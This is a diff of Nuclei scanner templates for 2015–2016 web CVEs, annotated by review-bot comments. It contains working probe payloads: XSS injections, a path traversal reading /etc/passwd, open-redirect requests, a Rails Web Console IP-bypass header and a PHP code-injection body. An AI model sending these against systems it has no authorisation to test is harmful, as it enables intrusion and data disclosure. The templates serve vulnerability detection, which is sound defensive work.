@@ -1,34 +1,37 @@ id: CVE-2015-9414 + info: name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter. reference: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414 - - https://wpvulndb.com/vulnerabilities/8175 - - https://wordpress.org/plugins/wp-symposium/#developers + tags: cve,cve2015,wordpress,wp-plugin,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2015-9414 cwe-id: CWE-79 - tags: cve,cve2015,wordpress,wp-plugin,xss + description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter." + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and matchers: - type: word words: - '' part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-9480.yaml b/nuclei-templates/CVE-2015/CVE-2015-9480.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-9480.yaml rename to nuclei-templates/CVE-2015/CVE-2015-9480.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-2166.yaml b/nuclei-templates/CVE-2015/cve-2015-2166.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-2166.yaml rename to nuclei-templates/CVE-2015/cve-2015-2166.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-2807.yaml b/nuclei-templates/CVE-2015/cve-2015-2807.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-2807.yaml rename to nuclei-templates/CVE-2015/cve-2015-2807.yaml 
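Review bot: The body word matcher on the new side is `words: - ''`; if the empty string is what the committed file holds (rather than a reflected-payload marker this rendering stripped), it matches every body and the template fires on any 200 `text/html` page, which is a false-positive generator rather than a detection. The same `- ''` body matcher appears in the new cve-2015-6544.yaml. The rewrite also drops two references (`https://wpvulndb.com/vulnerabilities/8175` and `https://wordpress.org/plugins/wp-symposium/#developers`) without a replacement, changes `cvss-score: 6.1` to `6.10`, and keeps the legacy `requests:` key where the other templates in this commit are migrated to `http:`.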
diff --git a/nuclei-templates/CVE-2015/cve-2015-3224.yaml b/nuclei-templates/CVE-2015/cve-2015-3224.yaml new file mode 100644 index 0000000000..df6b263f83 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-3224.yaml 
@@ -0,0 +1,57 @@
+id: CVE-2015-3224
+
+info:
+ name: Ruby on Rails Web Console - Remote Code Execution
+ author: pdteam
+ severity: medium
+ description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.
+ impact: |
+ Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system.
+ remediation: |
+ Upgrade to a patched version of Ruby on Rails or disable the Web Console feature.
+ reference:
+ - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/
+ - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/
+ - https://hackerone.com/reports/44513
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-3224
+ - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html
+ classification:
+ cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2015-3224
+ cwe-id: CWE-284
+ epss-score: 0.92904
+ epss-percentile: 0.98975
+ cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: rubyonrails
+ product: web_console
+ tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/{{randstr}}"
+
+ headers:
+ X-Forwarded-For: ::1
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Rails.root:"
+ - "Action Controller: Exception caught"
+ condition: and
+
+ - type: word
+ part: response
+ words:
+ - X-Web-Console-Session-Id
+ - data-remote-path=
+ - data-session-id=
+ case-insensitive: true
+ condition: or
+# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950
\ No
newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-3306.yaml b/nuclei-templates/CVE-2015/cve-2015-3306.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-3306.yaml rename to nuclei-templates/CVE-2015/cve-2015-3306.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-4666.yaml b/nuclei-templates/CVE-2015/cve-2015-4666.yaml deleted file mode 100644 index 374b84c7b5..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-4666.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2015-4666 - -info: - name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter. - reference: - - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-4666 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2015-4666 - cwe-id: CWE-22 - tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015 - -requests: - - method: GET - path: - - "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/13 diff --git a/nuclei-templates/CVE-2015/cve-2015-4668.yaml b/nuclei-templates/CVE-2015/cve-2015-4668.yaml new file mode 100644 index 0000000000..cb04dbfe5c --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-4668.yaml 
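Review bot: `severity: medium` sits under a `name` that says "Remote Code Execution" and an `impact` paragraph describing complete compromise of the system, while the CVSS 2.0 vector `C:N/I:P/A:N` (4.3) added in the same hunk rates only the `whitelisted_ips` bypass; either the name and impact should describe what the request actually confirms (an IP allow-list bypass of the Web Console) or the severity should be raised to match the stated impact. The file is also added as lowercase `cve-2015-3224.yaml` while this same commit renames other files in both directions (cve-2015-7377 → CVE-2015-7377, CVE-2015-2166 → cve-2015-2166), leaving the directory with mixed case; cve-2015-4668.yaml, cve-2015-5354.yaml and cve-2015-6544.yaml are added the same way. Since the `id:` values are uppercase `CVE-…`, the uppercase filename is the one to standardise on.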
@@ -0,0 +1,43 @@
+id: CVE-2015-4668
+
+info:
+ name: Xsuite <=2.4.4.5 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: |
+ Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.
+ impact: |
+ An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
+ remediation: |
+ Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability.
+ reference:
+ - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
+ - https://vuldb.com/?id.107082
+ - https://www.exploit-db.com/exploits/37708/
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-4668
+ - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2015-4668
+ cwe-id: CWE-601
+ epss-score: 0.00397
+ epss-percentile: 0.73024
+ cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: xceedium
+ product: xsuite
+ tags: cve2015,cve,redirect,xsuite,xceedium,edb
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/openwin.php?redirurl=http://interact.sh'
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
+# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2015/cve-2015-5354.yaml b/nuclei-templates/CVE-2015/cve-2015-5354.yaml new file mode 100644 index 0000000000..387ce0d925 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-5354.yaml 
@@ -0,0 +1,42 @@
+id: CVE-2015-5354
+
+info:
+ name: Novius OS 5.0.1-elche - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
+ impact: |
+ An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
+ remediation: |
+ Apply the latest security patches or upgrade to a newer version of Novius OS.
+ reference:
+ - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
+ - https://vuldb.com/?id.76181
+ - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
+ - https://nvd.nist.gov/vul n/detail/CVE-2015-5354
+ - https://www.exploit-db.com/exploits/37439/
+ classification:
+ cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
+ cvss-score: 5.8
+ cve-id: CVE-2015-5354
+ cwe-id: CWE-601
+ epss-score: 0.00166
+ epss-percentile: 0.53247
+ cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: novius-os
+ product: novius_os
+ tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
+# digest: 4a0a0047304502201fa0d9d2f70b020f889d8f45ac1c39f17dc563a71461963cc4c57b569f70d096022100ef358f446f62fcfbf11e15fb21855a3061d1f1cd2c38509a6fa7fc32a0256bf7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2015/cve-2015-6544.yaml b/nuclei-templates/CVE-2015/cve-2015-6544.yaml
new file mode 100644
index 0000000000..23b0e18646
--- /dev/null
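Review bot: The reference `https://nvd.nist.gov/vul n/detail/CVE-2015-5354` has a space inside the path and is not a usable URL; the other NVD links in this commit are intact, so this looks like a typo in the committed file rather than a rendering artifact, and it should read `https://nvd.nist.gov/vuln/detail/CVE-2015-5354`. The packetstorm advisory is listed twice, once as `https://` and once as `http://`, so one of the two can go. `xss` in `tags` is misleading for a template whose only matcher is a `Location` header regex for an open redirect; `redirect` already describes it, and a run filtered on `-tags xss` would pull in a check that cannot find XSS.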
+++ b/nuclei-templates/CVE-2015/cve-2015-6544.yaml
@@ -0,0 +1,36 @@
+id: CVE-2015-6544
+
+info:
+ name: iTop XSS
+ author: pikpikcu
+ severity: medium
+ description: |
+ Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544
+ tags: cve,cve2015,xss,itop
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2015-6544
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/nuclei-templates/CVE-2015/CVE-2015-7450.yaml b/nuclei-templates/CVE-2015/cve-2015-7450.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/CVE-2015-7450.yaml
rename to nuclei-templates/CVE-2015/cve-2015-7450.yaml
diff --git a/nuclei-templates/CVE-2015/cve-2015-8399.yaml b/nuclei-templates/CVE-2015/cve-2015-8399.yaml
index d4ae3f22f5..55ff02a7c7 100644
--- a/nuclei-templates/CVE-2015/cve-2015-8399.yaml
+++ b/nuclei-templates/CVE-2015/cve-2015-8399.yaml
@@ -1,4 +1,4 @@
-id: cve-2015-8399
+id: CVE-2015-8399
 info:
 author: princechaddha
 name: Atlassian Confluence configuration files read
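Review bot: `reference:` is a bare scalar (`reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544`) where every other template in this commit uses a list, and `name: iTop XSS` carries neither the affected range the description gives (`before 2.2.0-2459`) nor the vendor, e.g. `name: Combodo iTop < 2.2.0-2459 - Cross-Site Scripting`. The new file also uses the legacy `requests:` key and `cvss-score: 6.10` where the rest of the commit writes `6.1`, and it lacks the `epss`/`cpe`/`metadata` enrichment the updated templates receive.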
@@ -6,6 +6,12 @@ info:
 description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
 reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
 tags: cve,cve2015,atlassian,confluence
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.30
+ cve-id: CVE-2015-8399
+ cwe-id: CWE-200
+
 requests:
 - method: GET
 path:
@@ -15,6 +21,7 @@ requests:
 - type: status
 status:
 - 200
+
 - type: word
 words:
 - "confluence-init.properties"
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000126.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000126.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-1000126.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-1000126.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000127.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000127.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-1000127.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-1000127.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000128.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-1000128.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-1000128.yaml
diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml
deleted file mode 100644
index 10593e41a6..0000000000
--- a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml
+++ /dev/null
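Review bot: The id is changed to uppercase `CVE-2015-8399` in the first hunk but the file keeps its lowercase name `cve-2015-8399.yaml`, while neighbouring files in this same commit are renamed to match their ids; renaming this one too would keep id and path consistent. `cvss-score: 4.30` carries a trailing zero that the other `classification` blocks in the commit do not (`4.3`, `6.1`, `7.5`); it is harmless to a YAML parser but shows up in any tooling that compares scores textually. The added `classification` block also omits the `epss-score`, `cpe` and `metadata` fields the other updated templates receive, which is fine if that enrichment is applied in a separate pass.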
@@ -1,34 +0,0 @@ -id: CVE-2016-1000133 -info: - name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 - - https://wordpress.org/plugins/forget-about-shortcode-buttons - - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 - - http://www.securityfocus.com/bid/93869 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000133 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000134.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000134.yaml deleted file mode 100644 index 608daf2d21..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000134.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2016-1000134 -info: - name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin hdw-tube v1.2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 - - https://wordpress.org/plugins/hdw-tube - - http://www.securityfocus.com/bid/93868 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000134 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000135.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000135.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000135.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000135.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000138.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000138.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000138.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000138.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000141.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000141.yaml deleted file mode 100644 index 635ff46c5f..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000141.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2016-1000141 - -info: - name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability. - remediation: Upgrade to version 2.0 or higher. - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=358 - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 - tags: cve,cve2016,wordpress,xss,wp-plugin - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2016-1000141 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml deleted file mode 100644 index e25d5ac539..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2016-1000142 -info: - name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. - reference: - - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=435 - - https://wordpress.org/plugins/parsi-font - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000142 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000148.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000148.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000148.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000149.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000149.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000149.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-10033.yaml b/nuclei-templates/CVE-2016/CVE-2016-10033.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-10033.yaml rename to nuclei-templates/CVE-2016/CVE-2016-10033.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-10108.yaml b/nuclei-templates/CVE-2016/CVE-2016-10108.yaml index dcb9be0b22..8c3a189e04 100644 
--- a/nuclei-templates/CVE-2016/CVE-2016-10108.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-10108.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet. reference: @@ -18,15 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2016-10108 cwe-id: CWE-77 - epss-score: 0.84853 - epss-percentile: 0.98189 + epss-score: 0.86242 + epss-percentile: 0.98335 cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:* metadata: max-request: 1 vendor: western_digital product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 - tags: packetstorm,cve,cve2016,rce,oast,wdcloud + tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital http: - raw: @@ -42,4 +44,4 @@ http: - contains(interactsh_protocol, "dns") - status_code == 200 condition: and -# digest: 4a0a00473045022100b48315a429a010bd63a0753fac6aa41c637e4a2ecb89a85c97f2c7caa3ca3c5e02204f822becf3819902e770897b80f8ad9c94c3526efbcd11fbb7a5a5a6bcebf318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009c2486f30becc2499ca04c5fd0ac65f865b151e080af9af519b44a6d8dd42db022100b5c4bd69f88ec99e269d3b35db9eabdcffed4cb8a89aea1aa13bc5576b8349f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-10368.yaml b/nuclei-templates/CVE-2016/CVE-2016-10368.yaml index 83bb9e950a..f9d85a4d80 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-10368.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-10368.yaml 
@@ -6,18 +6,31 @@ info: severity: medium description: | Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. + remediation: | + Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774 - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 - https://nvd.nist.gov/vuln/detail/CVE-2016-10368 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-10368 cwe-id: CWE-601 - tags: cve,cve2016,redirect,opsview,authenticated + epss-score: 0.00204 + epss-percentile: 0.57743 + cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* + metadata: + max-request: 1 + vendor: opsview + product: opsview + tags: cve2016,cve,redirect,opsview,authenticated -requests: +http: - raw: - | POST /login HTTP/1.1 @@ -31,10 +44,9 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - type: status status: - 302 - -# Enhanced by mp on 2022/10/12 +# digest: 490a0046304402205efe425e5d9b18e4d0fbbc16efa3c8463f7588294009126f1ce333acc1f041de0220194d5a323c78df75dd1216016dc142581916068c79129fc2159ea61553b623b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
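Review bot: The `authenticated` tag is kept on the new side even though the request is a `POST /login` carrying the `back` parameter (the body continues outside the hunk) — as the description says, the redirect is on the login URI itself, and there is no credential step in the template — so the tag will exclude this check from unauthenticated scan profiles that should run it. If the raw request does depend on a session, a comment on it saying so would help; otherwise drop the tag. The regex change that removes the `?` after the scheme alternation is a useful tightening: a `Location:` value without a scheme or leading slash, i.e. a relative path that merely contains `interact.sh`, no longer matches.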
diff --git a/nuclei-templates/CVE-2016/CVE-2016-10960.yaml b/nuclei-templates/CVE-2016/CVE-2016-10960.yaml deleted file mode 100644 index b448f10340..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-10960.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-10960 - -info: - name: WordPress wSecure Lite < 2.4 - Remote Code Execution - author: daffainfo - severity: high - description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter. - reference: - - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 - - https://wordpress.org/plugins/wsecure/#developers - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2016-10960 - cwe-id: CWE-20 - metadata: - google-query: inurl:"/wp-content/plugins/wsecure" - tags: cve,cve2016,wordpress,wp-plugin,rce - -requests: - - method: POST - path: - - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" - body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' - - matchers-condition: and - matchers: - - type: word - words: - - "Nuclei: CVE-2016-10960" - condition: and - part: header - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2016/CVE-2016-10973.yaml b/nuclei-templates/CVE-2016/CVE-2016-10973.yaml index c705e21274..38766f39fb 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-10973.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-10973.yaml 
